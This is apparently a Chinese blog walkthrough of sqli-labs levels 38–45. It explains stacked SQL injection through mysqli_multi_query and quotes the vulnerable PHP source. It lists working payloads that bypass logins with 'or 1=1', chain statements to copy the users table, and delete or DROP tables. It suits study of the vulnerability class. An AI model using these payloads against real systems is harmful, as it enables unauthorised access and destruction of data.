Sqli-labs Less38-Less39 堆叠注入

于 2024-07-25 19:09:02 发布
阅读量642 收藏 30
点赞数 29
分类专栏: # Sqli-labs 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beiweixiaotian66/article/details/140697676
版权

文章目录

堆叠注入

sqli-labs 通关指南:Less 38 ~ 41

堆叠注入的原理

在SQL中,分号用来表示一条sql语句的结束,如果我们想将一堆sql语句一起执行,就是堆叠注入

结束一个分号后继续构建下一条语句,比如select*from users where id=1 ; create table test like users

就是新建一个表

或者比如用户输入1;DELETE FROM products当执行查询时,第一条显示查询的信息,第二条则将整个表进行删除

Less 38 ~ 41 虽然使用 Less 1 的方式注入即可注入成功,但是这 4 关存在堆叠注入漏洞。我们可以使用 “;” 闭合第一个 SQL 语句,然后在后面执行任意的 SQL 语句,通过这个漏洞我们可以对数据库执行任意的操作。

Less_38

sqli-labs 通关指南:Less 38 ~ 41 - 乌漆WhiteMoon

查看源码:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
    
    
    /* store first result set */
    if ($result = mysqli_store_result($con1))
    {
        if($row = mysqli_fetch_row($result))
        {
            echo '<font size = "5" color= "#00FF00">';	
            printf("Your Username is : %s", $row[1]);
            echo "<br>";
            printf("Your Password is : %s", $row[2]);
            echo "<br>";
            echo "</font>";
        }

可以看到mysqli_multi_query()该函数可以执行多条mysql语句

而之前的mysql_query()函数,该函数只能执行一条Mysql语句

常见的SQL命令

这道题是单引号注入

来试试堆叠注入吧

?id=1';create tables Cyan like users;--+,添加一个新的名为Cyan的表

image-20240720101434531

image-20240720101353855

可以看到多了个Cyan的表名

?id=1';INSRET INTO Cyan SELECT*FROM users;将users表中的数据插入到Cyan中去

image-20240720101913763

?id=1';DELETE FROM Cyan;--+ 将新建表中的数据删除

?id=1';DROP TABLE Cyan;--+ 将新建的表给删除

Less_39

先将常见的语句进行注入

?id=1'
?id=1')
?id=1'))
?id=1"
?id=1")
?id=1"))

发现都报错了

这道题是数字型注入

?id=1 and 1=1正常 ?id=1 and 1=2报错

和上题差不多了

?id=1;CREATE TABLE cyan LIKE usres;

image-20240720103309688

插入数据?id=1;INSERT INTO cyan SELECT*FROM users;

image-20240720103605900

Less_40

输入?id=1'报错,但是没有回显;

image-20240720103940183

经过尝试后,可以知道本题是单引号加上括号的盲注

?id=1;CREATE TABLE Cyan LIKE users;--+
?id=1;INSERT INTO Cyan SELECT * FROM users;--+
?id=1;DELETE FROM Cyan;--+
?id=1;DROP TABLE Cyan;--+

和38题一样

Less_41

多多尝试一下,是数字型的盲注

输入?id=1 and 1=1正常显示,输入?id=1 and 1=2报错

image-20240720104457399

?id=1;CREATE TABLE Cyan LIKE users;--+
?id=1;INSERT INTO Cyan SELECT * FROM users;--+
?id=1;DELETE FROM Cyan;--+
?id=1;DROP TABLE Cyan;--+

Less_42

打开发现是个登录框,和24题的二次注入的框框有点点像

image-20240720105105707

利用万能密码先注入,全部都登陆失败

1 OR 1 = 1#
a' OR 1 = 1#
a') OR 1 = 1#
a')) OR 1 = 1#
a" OR 1 = 1#
a") OR 1 = 1#
a")) OR 1 = 1#

对密码进行万能密码的注入1' or 1=1#

发现成功登陆了,密码字段存在单引号闭合的字符型注入

update更新数据后,经过mysql_real_escape_string ()处理后的数据,存入到数据库后不会发生变化,在select调用的时候才能发挥作用 。所以不用考虑考虑在更新密码处进行注入,所以这关和二次注入的思路是不一样的

查看Login中的源代码

$con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname);
   
   $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
   $password = $_POST["login_password"];

可以发现password没有通过mysqli_real_escape_string函数的处理,因此我们在登陆的时候可以进行attack

mysqli_real_escape_string  会对SQL中的特殊字符进行转义
会被进行转义的字符包括:NUL (ASCII 0)、 \n、\r、\、 '、" 和 CTRL+Z

在输密码那栏输入1';drop table cyan;#

这是之前的表名

image-20240720110838142

这是执行完命令之后的表名

image-20240720110738877

其余的命令和上面的相同

Less_43

1' or 1=1#

image-20240720111052197

1" or 1=1#,没有报错信息了

image-20240720111149222

1') or 1=1#,ok ,成功登录,说明密码字段存在单引号加括号的字符型注入

image-20240720111432601

查看源代码:

$con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname);
   
   $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
   $password = $_POST["login_password"];

和上题一样,1');create table me like users;

image-20240720112252308

okk,添加进去了

Less_44

1' or 1=1#吼,就直接登录进去了,密码存在单引号的注入

查看页面源代码:

$con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname);
   
   $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
   $password = $_POST["login_password"];

和上面的题一样

1';insert me select*from users;

之前的me 表

image-20240720113041905

插入数据后的me表

image-20240720113156814

Less_45

1') or 1=1#成功登录,密码字段存在单引号加上括号的字符型注入

在密码那里输入

1');delete from me#

可以看到没有数据噜

image-20240720113652754

1');drop table me#

行,已经被删掉了

image-20240720113840715

Cyan1u
关注
  • 29
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli注入详解——>sqli-labs less-1~65
qq_51780583的博客
03-18 791
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。服务器端有两个部分:第一部分为tomcat为引擎的jsp型服务器,第二部分为apache为引擎的php服务器,真正提供web服务器的是php服务器。工作流程为:client访问服务器能直接访问到tomcat服务器,然后tomcat服务器再向apache服务器请求数据。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
[网络安全]sqli-labs Less-26 解题详析
等风来
10-21 2048
以上为[网络安全]sqli-labs Less-26 解题详析,我是秋说,我们下次见。
SQLi Labs Less-38 堆叠注入
wangyuxiang946的博客
06-22 1万+
第三十八关请求方式为GET请求 , 注入类型为 单引号字符串型注入 第一步,测试注入方式 ?id=1' and false-- a SQL不成立时 , 结果不显示 , 固 单引号字符串型注入 , 源码如下 本题的重点在 mysqli_multi_query() , 可同时执行多条SQL , 即叠加注入 第二步,判断字段数 使用order by 排序 测试字段数量 ?id=1' order by 4 -- a 从第1列开始测试 , 直至报错 , 第4列开始异...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1257
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
SQLI-LABS Less-7 到 Less-8
Web学习之路
03-20 272
布尔盲注
[网络安全]sqli-labs Less-26a 解题详析
等风来
10-21 2049
这一关sql语句执行抛出错误后并不在页面输出,所以排除报错注入。可猜测后端查询语句为。
SQLi LABS Less-39 堆叠注入
wangyuxiang946的博客
06-22 1万+
第三十九关请求方式为GET请求 , 注入类型为 整形注入 第一步,判断注入类型 ?id=2 and false -- a SQL不成立时 , 不报错,并且无显示 , 说明拼接后的SQL可以正常执行 , 固 注入类型为 整形注入 源码如下 mysqli_multi_query() 可同时执行多条SQL语句 , 满足叠加注入的条件 第二步,判断字段数 使用 order by 测试字段数 ?id=2 order by 4 -- a 从第1列开始排序 , 依次加1 ...
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 655
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1&#39;)) union select 1,2,&#39;($_POST["lcy"]);?>&#39; into outfile &#39;D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php&#39;--`。 - **第8关:基于延迟的...
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8362
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
数理方法习题 前六章.pdf
08-03
数理方法习题 前六章
某大型制造企业IT蓝图规划及实施路线.pptx
最新发布
08-03
某大型制造企业IT蓝图规划及实施路线.pptx
基于Springboot和Vue的社区团购系统设计源码 社区团购系统设计代码(98分期末优秀大作业)
08-03
社区团购系统设计源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值